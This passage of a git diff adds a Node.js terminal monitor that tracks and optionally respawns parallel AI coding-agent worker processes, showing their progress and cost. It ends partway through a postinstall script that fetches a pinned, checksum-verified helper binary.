+import path from 'node:path';
+import { execSync } from 'node:child_process';
+
+// ─── Configuration ───────────────────────────────────────────────────────────
+
+const args = process.argv.slice(2);
+const INTERVAL_SEC = parseInt(getArg('--interval', '5'), 10);
+const PARALLEL_DIR = getArg('--dir', '.gsd/parallel');
+const PROJECT_ROOT = getArg('--root', process.cwd());
+const ONE_SHOT = args.includes('--once');
+const HEAL_MODE = args.includes('--heal');
+const HEAL_MAX_RETRIES = parseInt(getArg('--heal-retries', '3'), 10);
+const HEAL_COOLDOWN_SEC = parseInt(getArg('--heal-cooldown', '30'), 10);
+
+// Per-worker heal state: { lastAttempt: number, retries: number }
+const healState = {};
+
+function getArg(flag, defaultVal) {
+  const idx = args.indexOf(flag);
+  return idx !== -1 && args[idx + 1] ? args[idx + 1] : defaultVal;
+}
+
+// ─── ANSI Helpers ────────────────────────────────────────────────────────────
+
+const ESC = '\x1b[';
+const RESET = `${ESC}0m`;
+const BOLD = `${ESC}1m`;
+const DIM = `${ESC}2m`;
+const ITALIC = `${ESC}3m`;
+
+const FG = {
+  black: `${ESC}30m`,
+  red: `${ESC}31m`,
+  green: `${ESC}32m`,
+  yellow: `${ESC}33m`,
+  blue: `${ESC}34m`,
+  magenta: `${ESC}35m`,
+  cyan: `${ESC}36m`,
+  white: `${ESC}37m`,
+  gray: `${ESC}90m`,
+};
+
+const BG = {
+  black: `${ESC}40m`,
+  red: `${ESC}41m`,
+  green: `${ESC}42m`,
+  yellow: `${ESC}43m`,
+  blue: `${ESC}44m`,
+  white: `${ESC}47m`,
+};
+
+// Screen control
+const CLEAR_SCREEN = `${ESC}2J${ESC}H`;
+const HIDE_CURSOR = `${ESC}?25l`;
+const SHOW_CURSOR = `${ESC}?25h`;
+const SAVE_POS = `${ESC}s`;
+const RESTORE_POS = `${ESC}u`;
+
+function moveTo(row, col) { return `${ESC}${row};${col}H`; }
+
+// ─── Data Reading ────────────────────────────────────────────────────────────
+
+function readJsonSafe(filePath) {
+  try {
+    return JSON.parse(fs.readFileSync(filePath, 'utf-8'));
+  } catch {
+    return null;
+  }
+}
+
+function isPidAlive(pid) {
+  try {
+    process.kill(pid, 0);
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+function discoverWorkers() {
+  const dir = path.resolve(PROJECT_ROOT, PARALLEL_DIR);
+  const worktreeDir = path.resolve(PROJECT_ROOT, '.gsd/worktrees');
+  const mids = new Set();
+  
+  // From status files
+  if (fs.existsSync(dir)) {
+    for (const f of fs.readdirSync(dir)) {
+      if (f.endsWith('.status.json')) mids.add(f.replace('.status.json', ''));
+    }
+  }
+  
+  // From stderr/stdout logs (manually respawned workers may lack status.json)
+  if (fs.existsSync(dir)) {
+    for (const f of fs.readdirSync(dir)) {
+      const m = f.match(/^(M\d+)\.(stderr|stdout)\.log$/);
+      if (m) mids.add(m[1]);
+    }
+  }
+  
+  // From worktree directories that have auto.lock (actively running)
+  if (fs.existsSync(worktreeDir)) {
+    for (const d of fs.readdirSync(worktreeDir)) {
+      if (d.startsWith('M') && fs.existsSync(path.join(worktreeDir, d, '.gsd', 'auto.lock'))) {
+        mids.add(d);
+      }
+    }
+  }
+  
+  return [...mids].sort();
+}
+
+function readWorkerStatus(mid) {
+  const statusPath = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.status.json`);
+  return readJsonSafe(statusPath);
+}
+
+function readAutoLock(mid) {
+  const lockPath = path.resolve(PROJECT_ROOT, `.gsd/worktrees/${mid}/.gsd/auto.lock`);
+  return readJsonSafe(lockPath);
+}
+
+function querySliceProgress(mid) {
+  const dbPath = path.resolve(PROJECT_ROOT, `.gsd/worktrees/${mid}/.gsd/gsd.db`);
+  if (!fs.existsSync(dbPath)) return [];
+  
+  try {
+    const sql = `SELECT s.id, s.status, COUNT(t.id), SUM(CASE WHEN t.status='complete' THEN 1 ELSE 0 END) FROM slices s LEFT JOIN tasks t ON s.milestone_id=t.milestone_id AND s.id=t.slice_id WHERE s.milestone_id='${mid}' GROUP BY s.id ORDER BY s.id`;
+    const out = execSync(`sqlite3 "${dbPath}" "${sql}"`, { timeout: 3000, encoding: 'utf-8' }).trim();
+    if (!out) return [];
+    return out.split('\n').map(line => {
+      const [id, status, total, done] = line.split('|');
+      return { id, status, total: parseInt(total, 10), done: parseInt(done || '0', 10) };
+    });
+  } catch {
+    return [];
+  }
+}
+
+function readRecentEvents(mid, maxLines = 5) {
+  const stdoutPath = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stdout.log`);
+  const notifications = [];
+  const errors = [];
+  
+  // Parse NDJSON notify events from stdout log
+  if (fs.existsSync(stdoutPath)) {
+    try {
+      const stat = fs.statSync(stdoutPath);
+      const readSize = Math.min(stat.size, 32768);
+      const fd = fs.openSync(stdoutPath, 'r');
+      const buf = Buffer.alloc(readSize);
+      fs.readSync(fd, buf, 0, readSize, Math.max(0, stat.size - readSize));
+      fs.closeSync(fd);
+      const content = buf.toString('utf-8');
+      const lines = content.trim().split('\n').slice(-100);
+      
+      for (const line of lines) {
+        try {
+          const obj = JSON.parse(line);
+          if (obj.method === 'notify' && obj.message) {
+            notifications.push({ ts: Date.now(), msg: obj.message, mid });
+          }
+        } catch { /* skip */ }
+      }
+    } catch { /* skip */ }
+  }
+  
+  // Parse errors from stderr log — only new bytes since monitor started
+  const stderrPath = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stderr.log`);
+  if (fs.existsSync(stderrPath)) {
+    try {
+      const stat = fs.statSync(stderrPath);
+      
+      // Record baseline on first read — skip pre-existing errors
+      if (!(mid in stderrBaselines)) {
+        stderrBaselines[mid] = stat.size;
+      }
+      
+      const baseline = stderrBaselines[mid];
+      const newBytes = stat.size - baseline;
+      
+      if (newBytes > 0) {
+        const readSize = Math.min(newBytes, 4096);
+        const fd = fs.openSync(stderrPath, 'r');
+        const buf = Buffer.alloc(readSize);
+        fs.readSync(fd, buf, 0, readSize, Math.max(baseline, stat.size - readSize));
+        fs.closeSync(fd);
+        const content = buf.toString('utf-8');
+        const lines = content.trim().split('\n').slice(-10);
+        
+        for (const line of lines) {
+          if (line.includes('error') || line.includes('Error') || line.includes('WARN') || line.includes('exited')) {
+            errors.push({ ts: Date.now(), msg: line.trim(), mid, isError: true });
+          }
+        }
+      }
+    } catch { /* skip */ }
+  }
+  
+  return {
+    notifications: notifications.slice(-maxLines),
+    errors: errors.slice(-3),
+  };
+}
+
+/**
+ * Extract accumulated cost from NDJSON stdout log (fallback when status.json is missing).
+ * Sums `message.usage.cost.total` from all `message_end` events.
+ */
+function extractCostFromNdjson(mid) {
+  const stdoutPath = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stdout.log`);
+  if (!fs.existsSync(stdoutPath)) return 0;
+  
+  try {
+    const content = fs.readFileSync(stdoutPath, 'utf-8');
+    let total = 0;
+    for (const line of content.split('\n')) {
+      if (!line.includes('message_end')) continue;
+      try {
+        const obj = JSON.parse(line);
+        if (obj.type === 'message_end') {
+          const cost = obj.message?.usage?.cost?.total;
+          if (typeof cost === 'number') total += cost;
+        }
+      } catch { /* skip */ }
+    }
+    return total;
+  } catch {
+    return 0;
+  }
+}
+
+// ─── Self-Healing ────────────────────────────────────────────────────────────
+
+// Auto-detect the GSD loader path — works across npm global, homebrew, and local installs
+function findGsdLoader() {
+  // 1. Check if we're running from inside the gsd-2 repo itself
+  const repoLoader = path.resolve(import.meta.dirname, '..', 'dist', 'loader.js');
+  if (fs.existsSync(repoLoader)) return repoLoader;
+  
+  // 2. Check common global install locations
+  try {
+    const globalRoot = execSync('npm root -g', { encoding: 'utf-8', timeout: 3000 }).trim();
+    const candidates = [
+      path.join(globalRoot, 'gsd-pi', 'dist', 'loader.js'),
+      path.join(globalRoot, '@gsd', 'pi', 'dist', 'loader.js'),
+    ];
+    for (const c of candidates) {
+      if (fs.existsSync(c)) return c;
+    }
+  } catch { /* skip */ }
+  
+  // 3. Try `which gsd` and resolve symlink
+  try {
+    const bin = execSync('which gsd', { encoding: 'utf-8', timeout: 3000 }).trim();
+    if (bin) {
+      const realBin = fs.realpathSync(bin);
+      const loader = path.resolve(path.dirname(realBin), '..', 'dist', 'loader.js');
+      if (fs.existsSync(loader)) return loader;
+    }
+  } catch { /* skip */ }
+  
+  return null;
+}
+
+const GSD_LOADER = findGsdLoader();
+
+/**
+ * Respawn a dead worker. Returns the new PID or null on failure.
+ * Uses nohup + output redirection so the child is fully detached.
+ */
+function respawnWorker(mid) {
+  const worktreeDir = path.resolve(PROJECT_ROOT, `.gsd/worktrees/${mid}`);
+  if (!fs.existsSync(worktreeDir)) return null;
+  if (!fs.existsSync(GSD_LOADER)) return null;
+  
+  const stdoutLog = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stdout.log`);
+  const stderrLog = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stderr.log`);
+  
+  try {
+    const env = [
+      `GSD_MILESTONE_LOCK=${mid}`,
+      `GSD_PROJECT_ROOT=${PROJECT_ROOT}`,
+      `GSD_PARALLEL_WORKER=1`,
+    ].join(' ');
+    
+    // Use a shell script written to a temp file to avoid quoting hell
+    const script = [
+      '#!/bin/bash',
+      `cd "${worktreeDir}"`,
+      `export GSD_MILESTONE_LOCK=${mid}`,
+      `export GSD_PROJECT_ROOT="${PROJECT_ROOT}"`,
+      `export GSD_PARALLEL_WORKER=1`,
+      `exec node "${GSD_LOADER}" headless --json auto > "${stdoutLog}" 2>> "${stderrLog}"`,
+    ].join('\n');
+    
+    const scriptPath = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.respawn.sh`);
+    fs.writeFileSync(scriptPath, script, { mode: 0o755 });
+    
+    // Launch detached via nohup
+    const result = execSync(
+      `nohup bash "${scriptPath}" > /dev/null 2>&1 & echo $!`,
+      { timeout: 5000, encoding: 'utf-8', cwd: worktreeDir }
+    ).trim();
+    
+    // Clean up the temp script after a delay (process already forked)
+    setTimeout(() => {
+      try { fs.unlinkSync(scriptPath); } catch {}
+    }, 5000);
+    
+    const newPid = parseInt(result, 10);
+    return isNaN(newPid) ? null : newPid;
+  } catch (err) {
+    return null;
+  }
+}
+
+/**
+ * Check all workers and respawn dead ones if --heal is active.
+ * Returns an array of heal events for the event feed.
+ */
+function healWorkers(workers) {
+  if (!HEAL_MODE) return [];
+  
+  const events = [];
+  const now = Date.now();
+  
+  for (const wk of workers) {
+    if (wk.alive) {
+      // Worker is alive — reset its heal state on success
+      if (healState[wk.mid]) {
+        healState[wk.mid].retries = 0;
+      }
+      continue;
+    }
+    
+    // Worker is dead — check if we should attempt a respawn
+    if (!healState[wk.mid]) {
+      healState[wk.mid] = { lastAttempt: 0, retries: 0 };
+    }
+    
+    const hs = healState[wk.mid];
+    
+    // Give up after max retries
+    if (hs.retries >= HEAL_MAX_RETRIES) {
+      if (hs.retries === HEAL_MAX_RETRIES) {
+        events.push({ 
+          ts: now, mid: wk.mid, 
+          msg: `⛔ ${wk.mid}: gave up after ${HEAL_MAX_RETRIES} respawn attempts` 
+        });
+        hs.retries++; // Increment past max so this message only shows once
+      }
+      continue;
+    }
+    
+    // Cooldown — don't respawn too quickly
+    const elapsed = now - hs.lastAttempt;
+    if (elapsed < HEAL_COOLDOWN_SEC * 1000) {
+      const remaining = Math.ceil((HEAL_COOLDOWN_SEC * 1000 - elapsed) / 1000);
+      // Don't spam the feed — only note on first cooldown tick
+      continue;
+    }
+    
+    // Check the milestone isn't already complete
+    const allSlicesDone = wk.slices.length > 0 && wk.slices.every(s => s.status === 'complete');
+    if (allSlicesDone) {
+      events.push({ ts: now, mid: wk.mid, msg: `✅ ${wk.mid}: all slices complete, no respawn needed` });
+      hs.retries = HEAL_MAX_RETRIES + 1; // Don't try again
+      continue;
+    }
+    
+    // Attempt respawn
+    hs.lastAttempt = now;
+    hs.retries++;
+    
+    events.push({ 
+      ts: now, mid: wk.mid, 
+      msg: `🔄 ${wk.mid}: respawning (attempt ${hs.retries}/${HEAL_MAX_RETRIES})...` 
+    });
+    
+    const newPid = respawnWorker(wk.mid);
+    
+    if (newPid) {
+      events.push({ 
+        ts: now, mid: wk.mid, 
+        msg: `🟢 ${wk.mid}: respawned as PID ${newPid}` 
+      });
+      // Reset stderr baseline so we don't show old errors
+      delete stderrBaselines[wk.mid];
+    } else {
+      events.push({ 
+        ts: now, mid: wk.mid, isError: true,
+        msg: `❌ ${wk.mid}: respawn failed` 
+      });
+    }
+  }
+  
+  return events;
+}
+
+// ─── Formatting Helpers ──────────────────────────────────────────────────────
+
+function formatDuration(ms) {
+  if (!ms || ms < 0) return '--:--';
+  const totalSec = Math.floor(ms / 1000);
+  const h = Math.floor(totalSec / 3600);
+  const m = Math.floor((totalSec % 3600) / 60);
+  const s = totalSec % 60;
+  if (h > 0) return `${h}h${String(m).padStart(2, '0')}m`;
+  return `${String(m).padStart(2, '0')}m${String(s).padStart(2, '0')}s`;
+}
+
+function formatCost(cost) {
+  if (cost == null) return '$-.--';
+  return `$${cost.toFixed(2)}`;
+}
+
+function healthColor(heartbeatAge, alive) {
+  if (!alive) return 'red';
+  // PID alive is the strongest signal — worker is running
+  if (heartbeatAge < 30000) return 'green';
+  // Alive but stale heartbeat — either respawned (no orchestrator writing status.json)
+  // or potentially stuck. Show green since headless idle timeout (120s) kills stuck workers.
+  if (alive) return 'green';
+  return 'red';
+}
+
+function healthIcon(color) {
+  switch (color) {
+    case 'green': return '●';
+    case 'yellow': return '◐';
+    case 'red': return '○';
+    default: return '?';
+  }
+}
+
+function unitTypeLabel(unitType) {
+  const labels = {
+    'execute-task': 'EXEC',
+    'research-slice': 'RSRCH',
+    'plan-slice': 'PLAN',
+    'complete-slice': 'DONE',
+    'complete-task': 'DONE',
+    'reassess': 'ASSESS',
+    'validate': 'VALID',
+  };
+  return labels[unitType] || (unitType || '---').toUpperCase().slice(0, 5);
+}
+
+function progressBar(done, total, width = 20) {
+  if (total === 0) return `${'░'.repeat(width)}`;
+  const filled = Math.round((done / total) * width);
+  const empty = width - filled;
+  return `${'█'.repeat(filled)}${'░'.repeat(empty)}`;
+}
+
+function pad(str, width) {
+  const s = String(str);
+  return s.length >= width ? s.slice(0, width) : s + ' '.repeat(width - s.length);
+}
+
+function rpad(str, width) {
+  const s = String(str);
+  return s.length >= width ? s.slice(0, width) : ' '.repeat(width - s.length) + s;
+}
+
+function truncate(str, maxLen) {
+  if (str.length <= maxLen) return str;
+  return str.slice(0, maxLen - 1) + '…';
+}
+
+/**
+ * Get recently completed tasks/slices from the worktree DB for the event feed.
+ */
+function queryRecentCompletions(mid) {
+  const dbPath = path.resolve(PROJECT_ROOT, `.gsd/worktrees/${mid}/.gsd/gsd.db`);
+  if (!fs.existsSync(dbPath)) return [];
+  
+  try {
+    // Completed tasks with timestamps, most recent first
+    const sql = `SELECT id, slice_id, one_liner, completed_at FROM tasks WHERE milestone_id='${mid}' AND status='complete' AND completed_at IS NOT NULL ORDER BY completed_at DESC LIMIT 5`;
+    const out = execSync(`sqlite3 "${dbPath}" "${sql}"`, { timeout: 3000, encoding: 'utf-8' }).trim();
+    if (!out) return [];
+    return out.split('\n').map(line => {
+      const [taskId, sliceId, oneLiner, completedAt] = line.split('|');
+      return {
+        ts: completedAt ? new Date(completedAt).getTime() : Date.now(),
+        msg: `✓ ${mid}/${sliceId}/${taskId}${oneLiner ? ': ' + oneLiner : ''}`,
+        mid,
+      };
+    });
+  } catch {
+    return [];
+  }
+}
+
+// ─── Rendering ───────────────────────────────────────────────────────────────
+
+const COLS = Math.max(process.stdout.columns || 100, 80);
+const ROWS = Math.max(process.stdout.rows || 40, 20);
+
+let lastEventFeed = []; // Persisted across renders
+const stderrBaselines = {}; // mid → file size at monitor startup (skip pre-existing errors)
+
+function collectWorkerData() {
+  const mids = discoverWorkers();
+  const workers = [];
+  
+  for (const mid of mids) {
+    const status = readWorkerStatus(mid);
+    const lock = readAutoLock(mid);
+    const slices = querySliceProgress(mid);
+    const { notifications, errors } = readRecentEvents(mid, 3);
+    
+    // Prefer auto.lock PID (written by the running worker) over status.json PID 
+    // (written by the orchestrator, stale after respawn)
+    const pid = lock?.pid || status?.pid;
+    const alive = pid ? isPidAlive(pid) : false;
+    // Heartbeat: prefer status.json if its PID matches (orchestrator-managed),
+    // otherwise fall back to stdout.log mtime (respawned workers write NDJSON continuously)
+    let heartbeatAge = Infinity;
+    const statusPidMatches = status?.pid && status.pid === pid;
+    if (status?.lastHeartbeat && statusPidMatches) {
+      heartbeatAge = Date.now() - status.lastHeartbeat;
+    } else {
+      // Check stdout/stderr log mtime as proxy heartbeat
+      const stdoutLog = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stdout.log`);
+      const stderrLog = path.resolve(PROJECT_ROOT, PARALLEL_DIR, `${mid}.stderr.log`);
+      try {
+        const mtimes = [];
+        if (fs.existsSync(stdoutLog)) mtimes.push(fs.statSync(stdoutLog).mtimeMs);
+        if (fs.existsSync(stderrLog)) mtimes.push(fs.statSync(stderrLog).mtimeMs);
+        if (lock?.unitStartedAt) mtimes.push(new Date(lock.unitStartedAt).getTime());
+        if (mtimes.length > 0) heartbeatAge = Date.now() - Math.max(...mtimes);
+      } catch { /* skip */ }
+    }
+    
+    // Cost: prefer status.json, fall back to NDJSON log parsing
+    let cost = status?.cost || 0;
+    if (cost === 0) {
+      cost = extractCostFromNdjson(mid);
+    }
+    
+    const totalTasks = slices.reduce((sum, s) => sum + s.total, 0);
+    const doneTasks = slices.reduce((sum, s) => sum + s.done, 0);
+    const doneSlices = slices.filter(s => s.status === 'complete').length;
+    const totalSlices = slices.length;
+    
+    // Current unit from auto.lock (more accurate than status.json currentUnit)
+    const currentUnit = lock?.unitId || status?.currentUnit || null;
+    const unitType = lock?.unitType || null;
+    const unitStarted = lock?.unitStartedAt ? new Date(lock.unitStartedAt).getTime() : null;
+    
+    // If no lock and worker is dead, show nothing (not a misleading "START" label)
+    const showUnit = currentUnit || (alive ? null : null);
+    
+    const elapsed = status?.startedAt 
+      ? Date.now() - status.startedAt 
+      : (lock?.startedAt ? Date.now() - new Date(lock.startedAt).getTime() : 0);
+    
+    workers.push({
+      mid,
+      pid,
+      alive,
+      state: alive ? 'running' : (status?.state || 'dead'),
+      cost,
+      heartbeatAge,
+      health: healthColor(heartbeatAge, alive),
+      currentUnit,
+      unitType,
+      unitElapsed: unitStarted ? Date.now() - unitStarted : 0,
+      elapsed,
+      totalTasks,
+      doneTasks,
+      totalSlices,
+      doneSlices,
+      slices,
+      notifications,
+      errors,
+    });
+  }
+  
+  return workers;
+}
+
+function render(workers) {
+  const buf = [];
+  const w = COLS;
+  
+  // ── Header ──
+  buf.push('');
+  const title = ' GSD Parallel Monitor ';
+  const titlePad = Math.max(0, Math.floor((w - title.length) / 2));
+  buf.push(
+    `${' '.repeat(titlePad)}${BOLD}${BG.blue}${FG.white}${title}${RESET}`
+  );
+  
+  const now = new Date().toLocaleTimeString();
+  const totalCost = workers.reduce((s, w) => s + w.cost, 0);
+  const aliveCount = workers.filter(w => w.alive).length;
+  
+  const healTag = HEAL_MODE ? `  │  ${FG.green}⚕ heal${RESET}${DIM}` : '';
+  buf.push(
+    `${DIM}  ${now}  │  ${aliveCount}/${workers.length} alive  │  Total: ${RESET}${BOLD}${formatCost(totalCost)}${RESET}${DIM}  │  Refresh: ${INTERVAL_SEC}s${healTag}${RESET}`
+  );
+  buf.push(`${DIM}${'─'.repeat(w)}${RESET}`);
+  
+  // ── Worker Panels ──
+  if (workers.length === 0) {
+    buf.push('');
+    buf.push(`  ${FG.yellow}No workers found in ${PARALLEL_DIR}/${RESET}`);
+    buf.push(`  ${DIM}Waiting for .gsd/parallel/*.status.json files...${RESET}`);
+  } else {
+    for (const wk of workers) {
+      buf.push('');
+      
+      // Worker header: milestone ID + health + state
+      const icon = healthIcon(wk.health);
+      const hc = FG[wk.health];
+      const stateLabel = wk.alive 
+        ? (wk.state === 'running' ? `${FG.green}RUNNING${RESET}` : `${FG.yellow}${wk.state.toUpperCase()}${RESET}`)
+        : `${FG.red}${BOLD}DEAD${RESET}`;
+      
+      const heartbeatText = wk.heartbeatAge === Infinity
+        ? 'never'
+        : formatDuration(wk.heartbeatAge) + ' ago';
+      
+      buf.push(
+        `  ${hc}${icon}${RESET}  ${BOLD}${wk.mid}${RESET}  ${stateLabel}  ${DIM}PID ${wk.pid || '?'}${RESET}  ${DIM}│${RESET}  ${DIM}elapsed${RESET} ${formatDuration(wk.elapsed)}  ${DIM}│${RESET}  ${DIM}cost${RESET} ${BOLD}${formatCost(wk.cost)}${RESET}  ${DIM}│${RESET}  ${DIM}heartbeat${RESET} ${hc}${heartbeatText}${RESET}`
+      );
+      
+      // Current unit
+      if (wk.currentUnit) {
+        const phaseColor = wk.unitType === 'execute-task' ? FG.cyan 
+          : wk.unitType === 'research-slice' ? FG.magenta
+          : wk.unitType === 'plan-slice' ? FG.blue
+          : wk.unitType?.includes('complete') ? FG.green
+          : FG.white;
+        
+        buf.push(
+          `     ${DIM}▸${RESET} ${phaseColor}${unitTypeLabel(wk.unitType)}${RESET}  ${wk.currentUnit}  ${DIM}(${formatDuration(wk.unitElapsed)})${RESET}`
+        );
+      } else if (!wk.alive) {
+        buf.push(`     ${DIM}▸ ${FG.red}stopped${RESET}`);
+      } else {
+        buf.push(`     ${DIM}▸ idle / between units${RESET}`);
+      }
+      
+      // Slice progress grid
+      if (wk.slices.length > 0) {
+        const sliceChips = wk.slices.map(s => {
+          const pct = s.total > 0 ? s.done / s.total : 0;
+          let color;
+          if (s.status === 'complete') color = FG.green;
+          else if (pct > 0) color = FG.yellow;
+          else color = FG.gray;
+          
+          const label = `${s.id}:${s.done}/${s.total}`;
+          return `${color}${label}${RESET}`;
+        });
+        
+        buf.push(`     ${DIM}slices${RESET}  ${sliceChips.join('  ')}`);
+        
+        // Overall progress bar
+        const bar = progressBar(wk.doneTasks, wk.totalTasks, 30);
+        const pctStr = wk.totalTasks > 0 
+          ? `${Math.round((wk.doneTasks / wk.totalTasks) * 100)}%` 
+          : '0%';
+        buf.push(
+          `     ${DIM}tasks${RESET}   ${FG.green}${bar}${RESET}  ${wk.doneTasks}/${wk.totalTasks} ${DIM}(${pctStr})${RESET}  ${DIM}│${RESET}  ${DIM}slices done${RESET} ${wk.doneSlices}/${wk.totalSlices}`
+        );
+      }
+      
+      // Recent errors from this worker
+      if (wk.errors.length > 0) {
+        for (const err of wk.errors.slice(-2)) {
+          buf.push(`     ${FG.red}⚠ ${truncate(err.msg, w - 10)}${RESET}`);
+        }
+      }
+    }
+  }
+  
+  // ── Separator ──
+  buf.push('');
+  buf.push(`${DIM}${'─'.repeat(w)}${RESET}`);
+  
+  // ── Event Feed ──
+  buf.push(`  ${BOLD}Recent Events${RESET}`);
+  
+  // Collect new notification events from all workers
+  for (const wk of workers) {
+    for (const evt of wk.notifications) {
+      if (!lastEventFeed.some(e => e.msg === evt.msg && e.mid === evt.mid)) {
+        lastEventFeed.push(evt);
+      }
+    }
+  }
+  
+  // Also add recent task completions from the DB
+  for (const wk of workers) {
+    const completions = queryRecentCompletions(wk.mid);
+    for (const evt of completions) {
+      if (!lastEventFeed.some(e => e.msg === evt.msg)) {
+        lastEventFeed.push(evt);
+      }
+    }
+  }
+  
+  // Sort by timestamp and keep last 10
+  lastEventFeed.sort((a, b) => a.ts - b.ts);
+  lastEventFeed = lastEventFeed.slice(-10);
+  
+  if (lastEventFeed.length === 0) {
+    buf.push(`  ${DIM}No events yet...${RESET}`);
+  } else {
+    for (const evt of lastEventFeed.slice(-6)) {
+      const midTag = `${FG.cyan}${evt.mid}${RESET}`;
+      buf.push(`  ${DIM}│${RESET} ${midTag} ${truncate(evt.msg, w - 12)}`);
+    }
+  }
+  
+  // ── Completion Check ──
+  const allDone = workers.length > 0 && workers.every(w => !w.alive);
+  if (allDone) {
+    buf.push('');
+    buf.push(`${DIM}${'─'.repeat(w)}${RESET}`);
+    buf.push('');
+    const doneMsg = ' ALL WORKERS COMPLETE ';
+    const donePad = Math.max(0, Math.floor((w - doneMsg.length) / 2));
+    buf.push(
+      `${' '.repeat(donePad)}${BOLD}${BG.green}${FG.black}${doneMsg}${RESET}`
+    );
+    buf.push('');
+    for (const wk of workers) {
+      buf.push(`  ${wk.mid}  ${formatCost(wk.cost)}  ${DIM}│${RESET}  ${wk.doneSlices}/${wk.totalSlices} slices  ${wk.doneTasks}/${wk.totalTasks} tasks  ${DIM}│${RESET}  ${formatDuration(wk.elapsed)}`);
+    }
+    const totalCostFinal = workers.reduce((s, w) => s + w.cost, 0);
+    buf.push(`  ${BOLD}Total: ${formatCost(totalCostFinal)}${RESET}`);
+  }
+  
+  // ── Footer ──
+  buf.push('');
+  const healInfo = HEAL_MODE 
+    ? ` │ heal: ${HEAL_COOLDOWN_SEC}s cooldown, ${HEAL_MAX_RETRIES} max retries`
+    : '';
+  buf.push(`  ${DIM}Ctrl+C to exit${allDone ? ' (monitoring stopped)' : ''}${healInfo}${RESET}`);
+  
+  // Write to screen
+  process.stdout.write(CLEAR_SCREEN);
+  process.stdout.write(buf.join('\n') + '\n');
+  
+  return allDone;
+}
+
+// ─── Main Loop ───────────────────────────────────────────────────────────────
+
+function main() {
+  process.stdout.write(HIDE_CURSOR);
+  
+  // Handle resize
+  process.stdout.on('resize', () => {
+    // COLS/ROWS are recalculated on next render
+  });
+  
+  // Graceful exit
+  const cleanup = () => {
+    process.stdout.write(SHOW_CURSOR);
+    process.stdout.write(CLEAR_SCREEN);
+    console.log('Monitor stopped.');
+    process.exit(0);
+  };
+  
+  process.on('SIGINT', cleanup);
+  process.on('SIGTERM', cleanup);
+  
+  // Initial render
+  const workers = collectWorkerData();
+  const healEvents = healWorkers(workers);
+  for (const evt of healEvents) lastEventFeed.push(evt);
+  let done = render(workers);
+  
+  if (done || ONE_SHOT) {
+    process.stdout.write(SHOW_CURSOR);
+    return;
+  }
+  
+  // Refresh loop
+  const timer = setInterval(() => {
+    try {
+      const workers = collectWorkerData();
+      const healEvents = healWorkers(workers);
+      for (const evt of healEvents) lastEventFeed.push(evt);
+      done = render(workers);
+      
+      if (done) {
+        clearInterval(timer);
+        // Keep showing final state for 3 seconds then exit
+        setTimeout(() => {
+          process.stdout.write(SHOW_CURSOR);
+          process.exit(0);
+        }, 3000);
+      }
+    } catch (err) {
+      // Don't crash the monitor on transient read errors
+      process.stderr.write(`Monitor error: ${err.message}\n`);
+    }
+  }, INTERVAL_SEC * 1000);
+}
+
+main();
diff --git a/scripts/postinstall.js b/scripts/postinstall.js
index a75953878..2e4b39776 100644
--- a/scripts/postinstall.js
+++ b/scripts/postinstall.js
@@ -1,23 +1,180 @@
 #!/usr/bin/env node
 
-import { exec as execCb } from 'child_process'
-import { dirname, resolve } from 'path'
+import { exec as execCb, spawnSync } from 'child_process'
+import { createHash, randomUUID } from 'crypto'
+import { chmodSync, copyFileSync, createWriteStream, existsSync, mkdirSync, readFileSync, readdirSync, rmSync } from 'fs'
+import { arch, homedir, platform } from 'os'
+import { dirname, resolve, join } from 'path'
+import { Readable } from 'stream'
+import { finished } from 'stream/promises'
+import extractZip from 'extract-zip'
 import { fileURLToPath } from 'url'
 
 const __dirname = dirname(fileURLToPath(import.meta.url))
 const cwd = resolve(__dirname, '..')
-const shouldSkip =
+const PLAYWRIGHT_SKIP =
   process.env.PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD === '1' ||
   process.env.PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD === 'true'
+const RTK_SKIP =
+  process.env.GSD_SKIP_RTK_INSTALL === '1' ||
+  process.env.GSD_SKIP_RTK_INSTALL === 'true' ||
+  process.env.GSD_RTK_DISABLED === '1' ||
+  process.env.GSD_RTK_DISABLED === 'true'
+
+const RTK_VERSION = '0.33.1'
+const RTK_REPO = 'rtk-ai/rtk'
+const RTK_ENV = { ...process.env, RTK_TELEMETRY_DISABLED: '1' }
+const managedBinDir = join(process.env.GSD_HOME || join(homedir(), '.gsd'), 'agent', 'bin')
+const managedBinaryPath = join(managedBinDir, platform() === 'win32' ? 'rtk.exe' : 'rtk')
 
 function run(cmd) {
-  return new Promise((resolve) => {
+  return new Promise((resolvePromise) => {
     execCb(cmd, { cwd }, (error, stdout, stderr) => {
-      resolve({ ok: !error, stdout, stderr })
+      resolvePromise({ ok: !error, stdout, stderr })
     })
   })
 }
 
-if (!shouldSkip) {
+function logWarn(message) {
+  process.stderr.write(`[gsd] postinstall: ${message}\n`)
+}
+
+function resolveAssetName() {
+  const currentPlatform = platform()
+  const currentArch = arch()
+  if (currentPlatform === 'darwin' && currentArch === 'arm64') return 'rtk-aarch64-apple-darwin.tar.gz'
+  if (currentPlatform === 'darwin' && currentArch === 'x64') return 'rtk-x86_64-apple-darwin.tar.gz'
+  if (currentPlatform === 'linux' && currentArch === 'arm64') return 'rtk-aarch64-unknown-linux-gnu.tar.gz'
+  if (currentPlatform === 'linux' && currentArch === 'x64') return 'rtk-x86_64-unknown-linux-musl.tar.gz'
+  if (currentPlatform === 'win32' && currentArch === 'x64') return 'rtk-x86_64-pc-windows-msvc.zip'
+  return null
+}
+
+function parseChecksums(text) {
+  const checksums = new Map()
+  for (const rawLine of text.split(/\r?\n/)) {
+    const line = rawLine.trim()
+    if (!line) continue
+    const match = line.match(/^([a-f0-9]{64})\s+(.+)$/i)
+    if (!match) continue
+    checksums.set(match[2], match[1].toLowerCase())
+  }
+  return checksums
+}
+
+function sha256File(path) {
+  const hash = createHash('sha256')
+  hash.update(readFileSync(path))
+  return hash.digest('hex')
+}
+
+async function downloadToFile(url, destination) {
+  const response = await fetch(url, { headers: { 'User-Agent': 'gsd-pi-postinstall' } })
+  if (!response.ok) {
